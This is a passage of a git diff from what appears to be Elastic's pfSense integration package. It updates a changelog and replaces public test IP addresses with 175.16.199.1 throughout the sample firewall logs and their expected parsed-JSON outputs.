MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled) -<27>1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]146.88.240.4:34745 +<27>1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745 <36>1 2021-07-03T22:40:38.477134-05:00 pfSense.example.com openvpn 68813 - - user 'bob' could not authenticate. <30>Aug 15 16:19:02 unbound[26931]: [26931:0] info: 192.168.1.1 api.opensubtitles.org. A IN <30>Aug 15 16:18:59 unbound[26931]: [26931:2] info: 172.16.33.2 clients4.google.com. A IN \ No newline at end of file diff --git a/packages/pfsense/changelog.yml b/packages/pfsense/changelog.yml index b19b8f91d31..93c51438ae6 100644 --- a/packages/pfsense/changelog.yml +++ b/packages/pfsense/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log index 8e040bdce2f..cf1e3479197 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log @@ -1,19 +1,19 @@ -<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,216.229.4.66,123,123,56 -<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56 +<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale <134>Jul 3 19:10:31 filterlog[72237]: 6,,,1000000105,igb1.27,match,block,in,6,0x00,0xf6279,1,UDP,17,32,fe80::208:9bff:fef3:652b,ff02::1:2,546,547,32 -<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale <134>Jul 3 19:10:33 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0x0,,64,29691,0,DF,17,udp,78,10.170.27.41,10.170.27.255,137,137,58 -<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,239.255.255.250,datalength=8 -<134>Jul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,142.250.114.105,request,37728,164 +<134>Jul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,175.16.199.1,datalength=8 +<134>Jul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,175.16.199.1,request,37728,164 <134>Jul 4 11:10:54 filterlog[72237]: 199,,,1557957510,igb1.15,match,pass,in,4,0x0,,64,0,0,DF,1,icmp,84,10.100.15.13,10.100.15.1,request,0,064 \ No newline at end of file diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json index c643759ad1e..553f5b780cd 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json @@ -8,23 +8,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -34,12 +36,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:sHss/MZhCpIXxOfJoM05khzrJ4k=", + "community_id": "1:tVSUn9UzCrzCUQ+t4rluKGR9bZg=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -83,14 +85,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385347616Z", - "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709404500Z", + "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -113,23 +115,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -139,12 +143,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Zc3pS1Oh8nfSraLiOoC003TyyeI=", + "community_id": "1:JkXOpAe6IFE5MicGFNlnd7Kt6P8=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -188,14 +192,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385360343Z", - "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709412800Z", + "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -218,26 +222,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-NE", - "city_name": "Lincoln", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Nebraska", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -96.6252, - "lat": 40.8247 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7806, + "number": 4837, "organization": { - "name": "Binary Net, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "216.229.4.66", + "address": "175.16.199.1", "port": 123, - "ip": "216.229.4.66" + "ip": "175.16.199.1" }, "rule": { "id": "1520797901" @@ -247,12 +250,12 @@ "address": "10.170.27.27", "ip": "10.170.27.27" }, - "message": "176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,216.229.4.66,123,123,56", + "message": "176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:neMw5xCgZIrq6Zpf5yzE3JdxlQg=", + "community_id": "1:lqVApk2FX0H8+Yluuj1CqR83drU=", "transport": "udp", "type": "ipv4", "bytes": 76, @@ -287,14 +290,14 @@ }, "related": { "ip": [ - "216.229.4.66", + "175.16.199.1", "10.170.27.27" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385363355Z", - "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,216.229.4.66,123,123,56", + "ingested": "2021-12-09T13:44:35.709421500Z", + "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -317,23 +320,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -343,12 +348,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Il9QNED3NjnmnpKBFtlZRLG5vf0=", + "community_id": "1:s6BZ2dIpNflL1wK2GOTj03NPi+A=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -392,14 +397,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385365940Z", - "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709427600Z", + "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -422,26 +427,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -451,12 +455,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ILAQmKYNJY6TYv9Cb9BZ0JcVLgw=", + "community_id": "1:wCwVSYNHZmxkcrLYOgGhKzPLN0c=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -500,14 +504,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385368516Z", - "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709435300Z", + "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -530,26 +534,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -559,12 +562,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:KOUO4DlIIBIJZptxMOvx/CV/TL4=", + "community_id": "1:hU8z0kIzXfY6WDCCq4pzWYAEs8U=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -608,14 +611,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385371102Z", - "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709444Z", + "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -693,7 +696,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385373665Z", + "ingested": "2021-12-09T13:44:35.709450700Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 6,,,1000000105,igb1.27,match,block,in,6,0x00,0xf6279,1,UDP,17,32,fe80::208:9bff:fef3:652b,ff02::1:2,546,547,32", "provider": "filterlog", "timezone": "-04:00", @@ -717,23 +720,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -743,12 +748,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Il9QNED3NjnmnpKBFtlZRLG5vf0=", + "community_id": "1:s6BZ2dIpNflL1wK2GOTj03NPi+A=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -792,14 +797,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385376480Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709457100Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -822,23 +827,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -848,12 +855,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:WA7YavPXGdzYCQltoA6i6087wdc=", + "community_id": "1:qhIea9mFyhvaUljq3IEFnGaluM8=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -897,14 +904,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385379084Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709463800Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -927,26 +934,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -956,12 +962,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:8IslgFYHUjlNL1DU1Mj7Qtxnvsw=", + "community_id": "1:yjMDSnd4M5ZNzvL0NOB1FR4Jjwk=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1005,14 +1011,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - 